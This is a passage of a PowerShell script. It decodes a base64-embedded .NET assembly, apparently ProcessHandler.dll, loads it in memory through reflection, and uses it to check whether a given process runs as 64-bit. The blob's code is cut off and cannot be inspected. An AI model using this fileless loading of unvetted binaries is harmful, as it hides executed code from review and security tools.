cAB5AHIAaQBnAGgAdAAAAEMAbwBwAHkAcgBpAGcAaAB0ACAAqQAgACAAMgAwADEAOAAAACoAAQABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAATgATAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAFAAcgBvAGMAZQBzAHMASABhAG4AZABsAGUAcgAuAGQAbABsAAAAAAA+AA8AAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAFAAcgBvAGMAZQBzAHMASABhAG4AZABsAGUAcgAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAACg3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==" $dllbytes = [System.Convert]::FromBase64String($ps) $assembly = [System.Reflection.Assembly]::Load($dllbytes) } $processHandle = (Get-Process -id $processID).Handle $is64 = [IntPtr]::Zero try{ [ProcessHandler]::IsWow64Process($processHandle, [ref]$is64) |Out-Null } catch { } $is64 }